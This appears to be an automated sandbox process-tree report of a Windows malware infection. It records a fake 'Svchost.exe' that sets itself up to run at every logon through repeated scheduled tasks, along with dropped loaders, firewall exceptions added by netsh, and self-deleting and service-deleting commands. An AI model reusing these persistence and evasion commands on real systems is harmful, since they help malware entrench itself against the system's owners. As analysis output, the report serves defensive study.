- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2464
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"10⤵
- Checks computer location settings
PID:5644 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:4428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MXJv6t7BHtd6.bat" "11⤵PID:2024
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:5660
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5552
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"12⤵
- Checks computer location settings
PID:4712 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:1944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UJx94jQ8Ppqx.bat" "13⤵PID:6108
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3944
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5640
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"14⤵
- Checks computer location settings
PID:2932 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:3296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s3KXNCqoWy9f.bat" "15⤵PID:3784
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:2412
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1468
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"16⤵
- Checks computer location settings
PID:6848 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:7040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wRIbjPxiZ8RO.bat" "17⤵PID:2144
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:5632
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5684
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"18⤵
- Checks computer location settings
PID:6620 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:2932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bk0odhI9iRqr.bat" "19⤵PID:6352
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:6720
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3612
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"20⤵
- Checks computer location settings
PID:7068 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:6216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\15KGtR30cbX1.bat" "21⤵PID:1992
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:4436
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6372
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"22⤵PID:6712
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:5636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krr2YQVMQMVO.bat" "23⤵PID:5900
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:7072
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4512
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"24⤵
- Checks computer location settings
PID:5264 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:6336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PIrC92q5jux8.bat" "25⤵PID:1244
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:5948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7148
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"26⤵PID:1072
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3eSkbD5DeFmx.bat" "27⤵PID:6660
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:1428
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5984
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"28⤵
- Checks computer location settings
PID:6164 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:5644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c9toXPrCFKku.bat" "29⤵PID:5960
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:6528
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5992
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"30⤵
- Suspicious use of SetWindowsHookEx
PID:6648 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:6888
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TZxbtsfDeEbC.bat" "31⤵PID:2412
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:7160
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"3⤵
- System Location Discovery: System Language Discovery
PID:744
-
-
C:\Users\Admin\AppData\Local\Temp\Files\T3.exe"C:\Users\Admin\AppData\Local\Temp\Files\T3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\T3.exe' -Force4⤵PID:7004
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tcp_windows_amd64.exe"C:\Users\Admin\AppData\Local\Temp\Files\tcp_windows_amd64.exe"3⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jopa.exe"C:\Users\Admin\AppData\Local\Temp\Files\jopa.exe"3⤵
- System Location Discovery: System Language Discovery
PID:6424
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"3⤵PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:6792 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6932
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3884
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe"C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe"3⤵PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5816 -
C:\Users\Admin\AppData\Roaming\Hwl7v5u9Is.exe"C:\Users\Admin\AppData\Roaming\Hwl7v5u9Is.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6212
-
-
C:\Users\Admin\AppData\Roaming\1GLVxaSwHn.exe"C:\Users\Admin\AppData\Roaming\1GLVxaSwHn.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"3⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:6016 -
C:\Users\Admin\AppData\Local\Temp\1547117288.exeC:\Users\Admin\AppData\Local\Temp\1547117288.exe4⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3016 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- System Location Discovery: System Language Discovery
PID:6300 -
C:\Users\Admin\AppData\Local\Temp\654932175.exeC:\Users\Admin\AppData\Local\Temp\654932175.exe6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\335214409.exeC:\Users\Admin\AppData\Local\Temp\335214409.exe7⤵
- System Location Discovery: System Language Discovery
PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\97976492.exeC:\Users\Admin\AppData\Local\Temp\97976492.exe7⤵
- System Location Discovery: System Language Discovery
PID:5820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 248368⤵
- Program crash
PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\543030932.exeC:\Users\Admin\AppData\Local\Temp\543030932.exe7⤵
- Checks computer location settings
PID:2964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f8⤵PID:5676
-
C:\Windows\system32\sc.exesc delete "WinMngr"9⤵
- Launches sc.exe
PID:4820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f9⤵PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1459321940.exeC:\Users\Admin\AppData\Local\Temp\1459321940.exe7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6184 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F8⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:7088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Microsoft Windows Security" /F9⤵
- System Location Discovery: System Language Discovery
PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe8⤵
- System Location Discovery: System Language Discovery
PID:6660 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM dwm.exe9⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe8⤵
- System Location Discovery: System Language Discovery
PID:2552 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM conhost.exe9⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe8⤵
- System Location Discovery: System Language Discovery
PID:6868 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM conhost.exe9⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe8⤵
- System Location Discovery: System Language Discovery
PID:4384 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM conhost.exe9⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe8⤵
- System Location Discovery: System Language Discovery
PID:5196 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM conhost.exe9⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\719412645.exeC:\Users\Admin\AppData\Local\Temp\719412645.exe7⤵
- Checks computer location settings
PID:6596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f8⤵PID:6304
-
C:\Windows\system32\sc.exesc delete "Windows Services"9⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f9⤵PID:5396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\218153347.exeC:\Users\Admin\AppData\Local\Temp\218153347.exe7⤵
- Checks computer location settings
PID:1080 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f8⤵PID:7052
-
C:\Windows\system32\sc.exesc delete "WinSvcs"9⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f9⤵PID:3420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1993626921.exeC:\Users\Admin\AppData\Local\Temp\1993626921.exe7⤵PID:3804
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" ""8⤵PID:3608
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit9⤵PID:6012
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "winsrvcs"10⤵PID:6180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\478020023.exeC:\Users\Admin\AppData\Local\Temp\478020023.exe7⤵
- Checks computer location settings
PID:784 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f8⤵PID:3612
-
C:\Windows\system32\sc.exesc delete "WinUpdt"9⤵
- Launches sc.exe
PID:6176
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f9⤵PID:4764
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"3⤵PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Runtime%20Broker.exe"C:\Users\Admin\AppData\Local\Temp\Files\Runtime%20Broker.exe"3⤵PID:3848
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2824 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff84d02cc40,0x7ff84d02cc4c,0x7ff84d02cc583⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1728,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1708 /prefetch:23⤵PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2196,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2220 /prefetch:33⤵PID:2508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2332 /prefetch:83⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:13⤵PID:680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:13⤵PID:1948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3732 /prefetch:13⤵PID:1668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:83⤵PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:83⤵PID:3156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4752,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:83⤵PID:3868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:83⤵PID:1840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:83⤵PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:83⤵PID:2464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4968 /prefetch:83⤵PID:2312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:83⤵PID:728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5264,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5236 /prefetch:23⤵PID:5716
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Program Files directory
PID:5404 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff690d14698,0x7ff690d146a4,0x7ff690d146b04⤵
- Drops file in Program Files directory
PID:5388
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4740,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4492 /prefetch:13⤵PID:1532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4988,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4044 /prefetch:13⤵PID:5832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3436,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4936 /prefetch:83⤵PID:2444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5288,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=860 /prefetch:83⤵PID:1348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5236,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:13⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5680,i,7416168419220735538,4014147322895488393,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5688 /prefetch:83⤵PID:3132
-
-
-
